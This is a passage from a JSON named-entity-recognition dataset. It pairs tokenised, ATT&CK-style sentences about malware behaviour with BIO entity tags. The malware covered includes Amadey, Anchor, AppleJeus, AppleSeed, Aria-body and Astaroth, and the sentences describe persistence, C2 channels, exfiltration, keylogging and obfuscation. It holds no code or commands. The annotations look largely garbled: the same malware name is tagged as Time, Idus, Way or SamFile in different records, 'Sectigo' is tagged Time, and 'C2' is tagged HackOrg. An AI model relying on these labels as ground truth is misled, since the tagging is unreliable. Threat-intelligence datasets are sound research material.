"WMI", "during", "execution", "to", "evade", "detection." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "decoded", "antivirus", "name", "strings." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "sent", "victim", "data", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "used", "fast", "flux", "DNS", "for", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "searched", "for", "folders", "associated", "with", "antivirus", "software." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "can", "download", "and", "execute", "files", "to", "further", "infect", "a", "host", "machine", "with", "additional", "malware." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "modified", "the", "`:Zone.Identifier`", "in", "the", "ADS", "area", "to", "zero." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "overwritten", "registry", "keys", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "used", "a", "variety", "of", "Windows", "API", "calls,", "including", "`GetComputerNameA`,", "`GetUserNameA`,", "and", "`CreateProcessA`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Amadey", "has", "obfuscated", "strings", "such", "as", "antivirus", "vendor", "names,", "domains,", "files,", "and", "others." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "changed", "the", "Startup", "folder", "to", "the", "one", "containing", "its", "executable", "by", "overwriting", "the", "registry", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "I-Way", "O" ] }, { "tokens": [ "Amadey", "has", "checked", "for", "a", "variety", "of", "antivirus", "products." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "collected", "the", "computer", "name", "and", "OS", "version", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "does", "not", "run", "any", "tasks", "or", "install", "additional", "malware", "if", "the", "victim", "machine", "is", "based", "in", "Russia." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Area" ] }, { "tokens": [ "Amadey", "can", "identify", "the", "IP", "address", "of", "a", "victim", "machine." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Amadey", "has", "collected", "the", "user", "name", "from", "a", "compromised", "host", "using", "`GetUserNameA`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Amadey", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Anchor", "has", "been", "signed", "with", "valid", "certificates", "to", "evade", "detection", "by", "security", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "install", "itself", "as", "a", "cron", "job." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Variants", "of", "Anchor", "can", "use", "DNS", "tunneling", "to", "communicate", "with", "C2." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "terminate", "itself", "if", "specific", "execution", "flags", "are", "not", "present." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "use", "secondary", "C2", "servers", "for", "communication", "after", "establishing", "connectivity", "and", "relaying", "victim", "information", "to", "primary", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "self", "delete", "its", "dropper", "after", "the", "malware", "is", "successfully", "deployed." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "download", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Anchor", "has", "used", "NTFS", "to", "hide", "files." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Anchor", "has", "used", "ICMP", "in", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Anchor", "has", "obfuscated", "code", "with", "stack", "strings", "and", "string", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "support", "windows", "execution", "via", "SMB", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Way" ] }, { "tokens": [ "Anchor", "can", "create", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "create", "and", "execute", "services", "to", "load", "its", "payload." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "has", "come", "with", "a", "packed", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "determine", "the", "hostname", "and", "linux", "version", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "determine", "the", "public", "IP", "and", "location", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "execute", "payloads", "via", "shell", "scripting." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Anchor", "has", "used", "HTTP", "and", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Anchor", "has", "used", "cmd.exe", "to", "run", "its", "self", "deletion", "routine." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Anchor", "can", "establish", "persistence", "by", "creating", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "presented", "the", "user", "with", "a", "UAC", "prompt", "to", "elevate", "privileges", "while", "installing." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "used", "a", "valid", "digital", "signature", "from", "Sectigo", "to", "appear", "legitimate." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "decoded", "files", "received", "from", "a", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "exfiltrated", "collected", "host", "information", "to", "a", "C2", "server." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "deleted", "the", "MSI", "file", "after", "installation." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "added", "a", "leading", "<code>.</code>", "to", "plist", "filenames,", "unlisting", "them", "from", "the", "Finder", "app", "and", "default", "Terminal", "directory", "listings." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "AppleJeus's", "installation", "process,", "it", "uses", "`postinstall`", "scripts", "to", "extract", "a", "hidden", "plist", "from", "the", "application's", "`/Resources`", "folder", "and", "execute", "the", "`plist`", "file", "as", "a", "Launch", "Daemon", "with", "elevated", "permissions." ], "ner_tags": [ "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "placed", "a", "plist", "file", "within", "the", "<code>LaunchDaemons</code>", "folder", "and", "launched", "it", "manually." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "loaded", "a", "plist", "file", "using", "the", "<code>launchctl</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "AppleJeus", "has", "required", "user", "execution", "of", "a", "malicious", "MSI", "installer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus's", "spearphishing", "links", "required", "user", "interaction", "to", "navigate", "to", "the", "malicious", "website." ], "ner_tags": [ "B-SecTeam", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "been", "installed", "via", "MSI", "installer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AppleJeus", "has", "XOR-encrypted", "collected", "system", "information", "prior", "to", "sending", "to", "a", "C2.", "AppleJeus", "has", "also", "used", "the", "open", "source", "ADVObfuscation", "library", "for", "its", "components." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "created", "a", "scheduled", "SYSTEM", "task", "that", "runs", "when", "a", "user", "logs", "in." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "been", "distributed", "via", "spearphishing", "link." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AppleJeus", "has", "collected", "the", "victim", "host", "information", "after", "infection." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "waited", "a", "specified", "time", "before", "downloading", "a", "second", "stage", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "used", "shell", "scripts", "to", "execute", "commands", "after", "installation", "and", "set", "persistence", "mechanisms." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "has", "sent", "data", "to", "its", "C2", "server", "via", "<code>POST</code>", "requests." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleJeus", "can", "install", "itself", "as", "a", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "gain", "system", "level", "privilege", "by", "passing", "<code>SeDebugPrivilege</code>", "to", "the", "<code>AdjustTokenPrivilege</code>", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "compressed", "collected", "data", "before", "exfiltration." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "zip", "and", "encrypt", "data", "collected", "on", "a", "target", "system." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "B-HackOrg", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "automatically", "collected", "data", "from", "USB", "drives,", "keystrokes,", "and", "screen", "images", "before", "exfiltration." ], "ner_tags": [ "B-Time", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "divided", "files", "if", "the", "size", "is", "0x1000000", "bytes", "or", "more." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "collect", "data", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "find", "and", "collect", "data", "from", "removable", "media", "devices." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "decode", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "exfiltrate", "files", "via", "the", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AppleSeed", "has", "exfiltrated", "files", "using", "web", "services." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "AppleSeed", "can", "use", "a", "second", "channel", "for", "C2", "when", "the", "primary", "channel", "is", "in", "upload", "mode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "delete", "files", "from", "a", "compromised", "host", "after", "they", "are", "exfiltrated." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "search", "for", ".txt,", ".ppt,", ".hwp,", ".pdf,", "and", ".doc", "files", "in", "specified", "directories." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "use", "JavaScript", "to", "execute", "PowerShell." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Tool" ] }, { "tokens": [ "AppleSeed", "can", "use", "<code>GetKeyState</code>", "and", "<code>GetKeyboardState</code>", "to", "capture", "keystrokes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "stage", "files", "in", "a", "central", "location", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "achieve", "execution", "through", "users", "running", "malicious", "file", "attachments", "distributed", "via", "email." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "B-Way" ] }, { "tokens": [ "AppleSeed", "can", "disguise", "JavaScript", "files", "as", "PDFs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "B-Way" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "rename", "its", "payload", "to", "ESTCommon.dll", "to", "masquerade", "as", "a", "DLL", "belonging", "to", "ESTsecurity." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Time" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "use", "multiple", "dynamically", "resolved", "API", "calls." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "Base64", "encode", "its", "payload", "and", "custom", "encrypt", "API", "calls." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "execute", "its", "payload", "via", "PowerShell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "AppleSeed", "can", "enumerate", "the", "current", "process", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "create", "the", "Registry", "key", "name", "<code>EstsoftAutoUpdate</code>", "at", "<code>HKCU\\Software\\Microsoft/Windows\\CurrentVersion\\RunOnce</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "call", "regsvr32.exe", "for", "execution." ], "ner_tags": [ "B-Time", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "take", "screenshots", "on", "a", "compromised", "host", "by", "calling", "a", "series", "of", "APIs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "used", "UPX", "packers", "for", "its", "payload", "DLL." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "been", "distributed", "to", "victims", "through", "malicious", "e-mail", "attachments." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "AppleSeed", "can", "identify", "the", "OS", "version", "of", "a", "targeted", "system." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "identify", "the", "IP", "of", "a", "targeted", "system." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "can", "pull", "a", "timestamp", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AppleSeed", "has", "the", "ability", "to", "communicate", "with", "C2", "over", "HTTP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "identify", "the", "titles", "of", "running", "windows", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "used", "ZIP", "to", "compress", "data", "gathered", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Time", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "execute", "a", "process", "using", "<code>runas</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "collect", "data", "from", "USB", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "decrypt", "the", "loader", "configuration", "and", "payload", "DLL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "use", "a", "DGA", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "inject", "itself", "into", "another", "process", "such", "as", "rundll32.exe", "and", "dllhost.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Aria-body", "has", "used", "an", "encrypted", "configuration", "file", "for", "its", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "delete", "files", "and", "directories", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "gather", "metadata", "from", "a", "file", "and", "to", "search", "for", "file", "and", "directory", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "download", "additional", "payloads", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "launch", "files", "using", "<code>ShellExecute</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "used", "TCP", "in", "C2", "communications." ], "ner_tags": [ "B-Org", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "enumerate", "loaded", "modules", "for", "a", "process.." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "use", "a", "reverse", "SOCKS", "proxy", "module." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Tool", "O" ] }, { "tokens": [ "Aria-body", "has", "established", "persistence", "via", "the", "Startup", "folder", "or", "Run", "Registry", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "capture", "screenshots", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "identify", "the", "hostname,", "computer", "name,", "Windows", "version,", "processor", "speed,", "machine", "GUID,", "and", "disk", "information", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "identify", "the", "location,", "public", "IP", "address,", "and", "domain", "name", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "gather", "TCP", "and", "UDP", "table", "status", "listings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "identify", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Aria-body", "has", "the", "ability", "to", "duplicate", "a", "token", "from", "ntprint.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Aria-body", "has", "used", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Arp", "can", "be", "used", "to", "display", "a", "host's", "ARP", "cache,", "which", "may", "include", "address", "resolutions", "for", "remote", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Arp", "can", "be", "used", "to", "display", "ARP", "configuration", "information", "on", "the", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "collects", "information", "from", "the", "clipboard", "by", "using", "the", "OpenClipboard()", "and", "GetClipboardData()", "libraries." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Astaroth", "has", "obfuscated", "and", "randomized", "parts", "of", "the", "JScript", "code", "it", "is", "initiating." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "ActiveX", "objects", "for", "file", "execution", "and", "manipulation." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "an", "external", "software", "known", "as", "NetPass", "to", "recover", "passwords." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "can", "launch", "itself", "via", "DLL", "Search", "Order", "Hijacking." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "I-Way", "I-Way", "O" ] }, { "tokens": [ "Astaroth", "can", "store", "C2", "information", "on", "cloud", "hosting", "services", "such", "as", "AWS", "and", "CloudFlare", "and", "websites", "like", "YouTube", "and", "Facebook." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-Org", "O", "B-Org" ] }, { "tokens": [ "Astaroth", "uses", "a", "fromCharCode()", "deobfuscation", "method", "to", "avoid", "explicitly", "writing", "execution", "commands", "and", "to", "hide", "its", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "has", "used", "a", "DGA", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "has", "used", "an", "XOR-based", "algorithm", "to", "encrypt", "payloads", "twice", "with", "different", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "exfiltrates", "collected", "information", "from", "its", "r1.log", "file", "to", "the", "external", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "loads", "its", "module", "with", "the", "XSL", "script", "parameter", "<code>vShow</code>", "set", "to", "zero,", "which", "opens", "the", "application", "with", "a", "hidden", "window." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "certutil", "and", "BITSAdmin", "to", "download", "additional", "malware." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "uses", "JavaScript", "to", "perform", "its", "core", "functionalities." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "logs", "keystrokes", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Astaroth", "collects", "data", "in", "a", "plaintext", "file", "named", "r1.log", "before", "exfiltration." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Astaroth", "has", "used", "malicious", "files", "including", "VBS,", "LNK,", "and", "HTML", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Astaroth", "can", "abuse", "alternate", "data", "streams", "(ADS)", "to", "store", "content", "for", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ 